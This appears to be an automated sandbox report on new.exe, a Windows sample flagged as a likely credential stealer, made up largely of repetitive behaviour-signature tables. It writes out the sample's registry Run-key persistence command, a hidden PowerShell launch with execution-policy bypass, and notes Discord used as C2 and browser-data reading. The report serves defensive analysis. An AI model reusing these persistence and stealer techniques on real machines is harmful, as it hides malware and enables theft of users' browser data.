Malware Analysis Report

2025-03-15 00:54

Sample ID 240626-qpm3pawfrb
Target new.exe
SHA256 dcfefc6ab68f29b9b2d1119bff758dd024d922b5ec7fa7d70110e50807863d86
Tags
defense_evasion execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

dcfefc6ab68f29b9b2d1119bff758dd024d922b5ec7fa7d70110e50807863d86

Threat Level: Likely malicious

The file new.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Window

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Modifies registry class

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates processes with tasklist

Modifies registry key

Detects videocard installed

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 13:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 13:26

Reported

2024-06-26 13:29

Platform

win7-20231129-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\new.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\new.exe

"C:\Users\Admin\AppData\Local\Temp\new.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 13:26

Reported

2024-06-26 13:35

Platform

win10v2004-20240611-en

Max time kernel

510s

Max time network

511s

Command Line

"C:\Users\Admin\AppData\Local\Temp\new.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\new.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\wpesfcWHQdjImlV.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\new.exe" C:\Windows\system32\reg.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638820123539450" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2080292272-204036150-2159171770-1000\{D4AA11F1-ED75-48B5-B3E5-B92618C61393} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 412 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
